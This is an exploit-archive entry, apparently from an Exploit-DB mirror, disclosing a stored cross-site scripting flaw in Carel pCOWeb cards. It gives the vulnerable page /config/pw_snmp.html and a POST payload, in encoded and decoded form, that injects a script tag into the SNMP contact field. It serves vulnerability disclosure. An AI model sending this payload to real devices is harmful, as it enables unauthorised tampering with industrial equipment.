edfd130ad1
11 changes to exploits/shellcodes BlueStacks 4.80.0.1060 - Denial of Service (PoC) RarmaRadio 2.72.3 - 'Server' Denial of Service (PoC) RarmaRadio 2.72.3 - 'Username' Denial of Service (PoC) TapinRadio 2.11.6 - 'Address' Denial of Service (PoC) TapinRadio 2.11.6 - 'Uername' Denial of Service (PoC) Zoho ManageEngine ServiceDesk Plus < 10.5 - Improper Access Restrictions Zoho ManageEngine ServiceDesk Plus 9.3 - Cross-Site Scripting AUO Solar Data Recorder < 1.3.0 - 'addr' Cross-Site Scripting Carel pCOWeb < B1.2.1 - Cross-Site Scripting Carel pCOWeb < B1.2.1 - Credentials Disclosure Horde Webmail 5.2.22 - Multiple Vulnerabilities
19 lines
No EOL
875 B
Text
19 lines
No EOL
875 B
Text
# Exploit Title: Carel pCOWeb - Stored XSS
|
|
# Date: 2019-04-16
|
|
# Exploit Author: Luca.Chiou
|
|
# Vendor Homepage: https://www.carel.com/
|
|
# Version: Carel pCOWeb all versions prior to B1.2.1
|
|
# Tested on: It is a proprietary devices: http://www.carel.com/product/pcoweb-card
|
|
|
|
# 1. Description:
|
|
# In Carel pCOWeb web page,
|
|
# user can modify the system configuration by access the /config/pw_snmp.html.
|
|
# Attackers can inject malicious XSS code in post data.
|
|
# The XSS code will be stored in database, so that cause a stored XSS vulnerability.
|
|
|
|
# 2. Proof of Concept:
|
|
# Browse http://<Your<http://%3cYour> Modem IP>/config/pw_snmp.html
|
|
# Send this post data:
|
|
%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E
|
|
# The post data in URL decode format is:
|
|
?script:setdb('snmp','syscontact')="><script>alert(123)</script> |